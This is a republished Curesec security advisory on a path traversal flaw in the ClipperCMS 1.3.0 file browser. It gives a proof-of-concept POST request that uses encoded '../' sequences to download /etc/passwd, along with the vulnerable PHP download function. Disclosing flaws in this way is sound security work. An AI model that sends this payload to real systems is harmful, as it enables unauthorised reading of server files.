ClipperCMS 1.3.0 Path Traversal

Published
Credit
Risk
2015.11.16
Curesec
Medium
CWE
CVE
Local
Remote
CWE-22
N/A
No
Yes

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: ClipperCMS 1.3.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://www.clippercms.com/
Vulnerability Type: Path Traversal
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 11/13/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS

Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N

Description

The "file" Parameter of the file browser is vulnerable to directory traversal,
allowing the download of arbitrary files.

A user account is needed with at least the lowest default role, which is
"Editor".

3. Proof of Concept


POST /ClipperCMS-clipper_1.3.0/manager/media/browser/kcfinder/browse.php?type=images&lng=en&act=download HTTP/1.1

dir=images&file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

4. Code


/ClipperCMS-clipper_1.3.0/manager/media/browser/kcfinder/core/browser.php
protected function act_download() {
$dir = $this->postDir();
if (!isset($this->post['dir']) ||
!isset($this->post['file']) ||
(false === ($file = "$dir/{$this->post['file']}")) ||
!file_exists($file) || !is_readable($file)
)
$this->errorMsg("Unknown error.");

header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private", false);
header("Content-Type: application/octet-stream");
header('Content-Disposition: attachment; filename="' . str_replace('"', "_", $this->post['file']) . '"');
header("Content-Transfer-Encoding: binary");
header("Content-Length: " . filesize($file));
readfile($file);
die;
}

5. Solution

This issue has not been fixed by the vendor.

6. Report Timeline

10/02/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/ClipperCMS-130-Path-Traversal-98.html


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com